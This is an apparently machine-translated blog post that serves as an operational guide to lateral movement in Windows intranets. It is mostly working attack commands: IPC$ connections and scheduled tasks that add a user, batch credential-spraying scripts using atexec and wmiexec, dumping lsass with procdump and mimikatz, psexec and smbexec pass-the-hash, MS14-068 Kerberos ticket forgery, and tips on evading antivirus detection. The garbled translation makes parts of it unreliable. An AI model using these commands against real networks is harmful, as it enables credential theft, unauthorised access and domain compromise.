Intranet penetration - the most practical summary of horizontal movement

Summary of Two Ways of Horizontal Movement of 0x00 Intranet

There are two ways to move the intranet horizontally: transmission and vulnerability:

Delivery is through a set of built-in protocols and commands.
For example:
winrs, winrm, RDP, SPN, etc., to achieve penetration into other intranet hosts,
Use tools: penetration by CobaltStrike, Ladon, etc.

A vulnerability is a host or other CV vulnerability that penetrates the host
For example:
CVE-2020-1472, etc., to achieve penetration into other intranet hosts,

0x01 lateral movement-at, schtasks transfer

Get the clear password or hash value of another host based on opening port 139,445
1) at transfer:
For at command, if the host is lower than win2012 and the user's clear password of the target system is known, the command can be executed directly on the remote host. First, at, sc protocol needs to be open on port 135/445, generally the host will be open. If it is not open, it will be moved by other means.

Utilize process

  1. Establish an IPC link to the target host and know the password information of the host account of the other party. Permission issues may occur if not successful
  2. Copy the command script to the target host
  3. View target time, create scheduled tasks (at, schtasks) to execute copied scripts regularly
  4. Delete IPC Link
establish ipc Connect: net use \\\ipc$ "" /\administrator
 Local production user.bat File local c Disk execution command script: net user haha /add
 Upload files to the other host C Disk: copy user.bat \\\c$ 
Add commands to the other host to execute the task: at \\ 12:20 c:\user.bat
 Wait to see the other host add user haha

Detailed steps: Set up a connection
Copy files to each other, add process tasks
View Added Successfully

establish IPC Common error codes
(1)5: Access is denied, possibly because the user used is not an administrator and needs to be elevated first
(2)51: Network problems, Windows Unable to find network path
(3)53: No network path found, possibly IP Address error, target not turned on, target Lanmanserver Service not started, has
 Firewall issues
(4)67: Network name not found, local Lanmanworkstation Service not started, target deleted ipc$
(5)1219: Provided credentials conflict with an existing credential set indicating that it has been established IPC$,Need to delete first
(6)1326: Account password error
(7)1792: target NetLogon The service is not started, which is often the case with connection domain control
(8)2242: User password expires, target account policy, force periodic password changes
#Reasons for failure to establish IPC
(1)The target system is not NT Or more operating systems
(2)The other party is not open IPC$Share
(3)The other party has not opened ports 139 or 445 or is blocked by a firewall
(4)Error in output command, account password

2) schtasks Delivery:
For at commands that require the other host to be higher than win2012, sc support 2012 includes the above versions

Utilization process:
Establish ipc Connect: net use \\\ipc$ "" /\administrator 
Copy script bat Files: copy user.bat \\\c$ 
Establish adduser Task Correspondence Execution File: schtasks /create /s /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\user.bat /F
 Perform file tasks: schtasks /run /s /tn adduser /i
 Delete Execution File Task: schtasks /delect /s /tn adduser /f

3) atexec.exe transverse osmosis hash transfer:
atexec is easier to kill, so exemption is needed in the real world.

FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #Batch Detection of IP Correspondence Clear Text
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #Batch Detection of IP Correspondence Clear Text
 Echo Version
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@ whoami #Batch Detection Clear Text Corresponding IP
 Echo Version
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@ whoami #Batch Detection
HASH Corresponding IP Echo Version

4) Phon batch IP, password, account survival:
Generate exe file:

File location:

Use pyinstaller Pack exe Run the file:
python Batch Detection: Using Collected Domains IP Information, password account information as dictionary
import os,time

for ip in ips:
    for user in users:
        for mima in passs:
            exec="net use \\"+"\\"+ip+'\ipc$'+mima+' /\\'+user

0x02 lateral movement - based on SMB psexec, smbexec transfer

psexec, smbexec is a connection based on SMB service and needs to open port 445 to get clear text or hash value

First introduce procdump and minikatz to get clear text password and hash value of this machine
Install procdump:
Generate lsass.dmp file: procdump-accepteula-ma lsass.exe lsass.dmp
Decrypt the password using mnikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

1) psexec transfer:
The first is to establish an ipc connection, clear text or hash delivery, which requires the administrator privileges of the other party, otherwise an error will occur
psexec is Microsoft's official and will not be killed:

establish ipc Connect: net use \\\ipc$ "" /user:administrator
 Use psexec Return cmd Window: psexec \\ -s cmd

Second: provide clear account password without setting up IPC

delete ipc Connect: net use * /delete
Direct clear text connection: psexec \\ -u administrator -p -s cmd
hash Connect:
psexec -hashes :$HASH$ ./administrator@
psexec -hashes :$HASH$ domain/administrator@
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@ Official Pstools Unable
 Mining. Need to use impacket Toolkit is easy to use and kill

2) smbexec delivery
No need to establish ipc link plain text or hash delivery first
This is using the impacket toolkit,
exe download address:
py version:

Clear text delivery command: smbexec
hash Delivery:
smbexec -hashes :$HASH$ ./admin@
smbbexec -hashes :$HASH$ domain/admin@

0x03 lateral movement, WMI-based wmic, vmiexec delivery

The 135 port service needs to be turned on to support plain text and hash delivery without leaving any traces in the log
1) wmic delivery
1. No echo in clear text delivery

Make a connection and the returned value needs to be read by the other host:
wmic /node: /user:administrator / process call create "cmd.exe /c ipconfig >C:\1.txt"

Read value:

2. Echoes are delivered in clear text, and vbs files are required

cscript //nologo wmiexec.vbs /shell administrator

3. Passing an echo exe version in plain text or hash using the suite impacket wmiexec may be susceptible to murder
Toolkit address:

Workgroup environment: wmiexec ./account:Password@ "whoami"
Domain environment: wmiexec god/ "whoami"
hash Delivery:
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@ "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@ "whoami"
See c Disk: wmiexec "dir /c" batch detection, circular account password,

Use python Of pyinstaller Module Export exe implement
pyinstaller.exe -F
import os,time
for ip in ips:
for user in users:
for mimahash in hashs:
#wmiexec -hashes :hashgod/user@ipwhoami
exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
print('--->' + exec + '<---')

0x04 lateral movement-PTH, PTK, PTT transfer

With these three protocols, it is important to note that when using PTH delivery, when patch kb2871997 exists on the other host, PTH with minikatz can only connect domain users, not other groups of users. PTK transfer requires patch kb2871997 on the other host before PTK can connect domain users or groups. Using ase256 connection, PTH and PTK transfer are based on NTML.Authentication, while PTT delivery is based on the kerbros protocol,

1) PTH with minikatz transfer:
Patched, ntlm passed:

Title: privilege::debug
ntlm Delivery: sekurlsa::pth /user:administrator / /ntlm:ccef208c6485269c20db2cad21734fe7
ntml Intra-group collisions: there may be identical administrtor User's hash value
sekurlsa::pth /user:administrator/domain:workgroup/ntlm:518b98ad4178a53695dc997aa02d455c
ntml Domain User Transfer: sekurlsa::pth /user:hsyy / /ntlm:ccef208c6485269c20db2cad21734fe7

2) Patch kb2871997 is required for PTK to cooperate with minikatz transfer

Use minikatz Obtain aes256_hmac: sekurlsa::ekeys
 Delivery connection:
sekurlsa::pth /user:mary/

3)PTT is transmitted by ms14-068:
ms14-068 is able to obtain domain-controlled system privileges from ordinary domain users

Steps to take ownership: MS14-068 powershell execution
1. View the current sid:whoami/user
2. Empty all credentials in the current machine, if any domain member credentials will affect credential forgery: mimikatz # kerberos::purge
3. View the current machine credentials: mimikatz # kerberos::list
4. Inject ticket into memory: mimikatz # kerberos::ptc ticket file
5. Generate TGT data using ms14-068: ms14-068.exe-u domain member name@domain name-s sid-d domain controller address-p domain member password
6. Note injection memory: turn on mimikatz.exe "kerberos::ptc"Exit exit
7. View the voucher list klist
8. Use of rights: dir \c$

Step implementation:
1. View sid:whoami/user
2. Generate tickets using ms14-068: ms14-068.exe-u domain member name@domain name-s sid-d domain controller address-p domain member password
3. Inject ticket:

4. Connect Domain Control to take ownership:
If not recognized, change IP to domain computer name

4) PTT is transferred by kekeo:

PTT Knowledge Point: PTT Rights Maintenance Technology: Golden ticket Silver ticket STLVER ticket

Steps to achieve:
1. Generate ticket ke kekeo "tgt:: ask/user:mary/"
2. Import ticket kerberos::ptt
3. View the voucher klist
4. Load dir \\c$using net use

5) PTT uses local tickets with mimikatz: Administrator rights are required:

Promote permissions: privilege::debug
Export ticket: sekurlsa::tickets/export
Utilize tickets: kerberos:: PTT xxxxxxxxx.xxxx.kirbi

6) Ladon tools recommended:
Testing and Acceptance of Domestic Ladon Intranet Killer
Implementation: Information Collection - Protocol Scanning - Vulnerability Probe - Delivery Attacks, etc.
Use address:

0x05 Transverse Transfer-RDP, SPN Scanning Technology

1) RDP delivery:

RDP technology is similar to ssh Remote Connection on linux, knowing each other's IP and account password to connect
Port 3389 needs to be opened
cmd run: mstsc
Clear text transmission
hash delivery comparison chicken ribs

2) SPN scan:

When a computer joins a domain, the primary SPN is automatically added to the ServicePrincipalName property of the domain's computer account. Install a new service
The SPN is then recorded in the appropriate attributes of the computer account.
SPN scanning is also known as Scan Kerberos Service Instance Name. The best way to discover a service in the Active Directory is SPN scanning. SPN scanning finds a service by requesting a service principal name for a specific SPN type. The main feature of SPN scanning is that it is unnecessary compared to network port scanning.
Check service ports by connecting each IP address in the network (there will be no large number of warnings due to rules that trigger devices such as IPS. IDS in the intranet)
Because SPN queries are part of Kerberos ticket behavior, detection is difficult.
Since SPN scanning is based on LDAP protocol to query domain controllers, an attacker only needs to obtain a common domain user privilege to perform SPN scanning.

0x06 Horizontal Move-CobaltStrike

Use process:
1.Start-Configure-Monitor Execution-.Online Title Collection (Network, Voucher, Location, etc.)-Penetrate
2. About Startup and Configuration
3. About Title and Plug-in Loading
4. About Information Collection Commands
5 About view automation

Installation use:

Domain penetration reference:
CS4.0 Manual:
Extraction Code: hsyy

Communication Learning:
CSND Community: Addressing Fever

Tags: Windows Intranet Penetration

Posted on Mon, 04 Oct 2021 12:45:43 -0400 by pytrin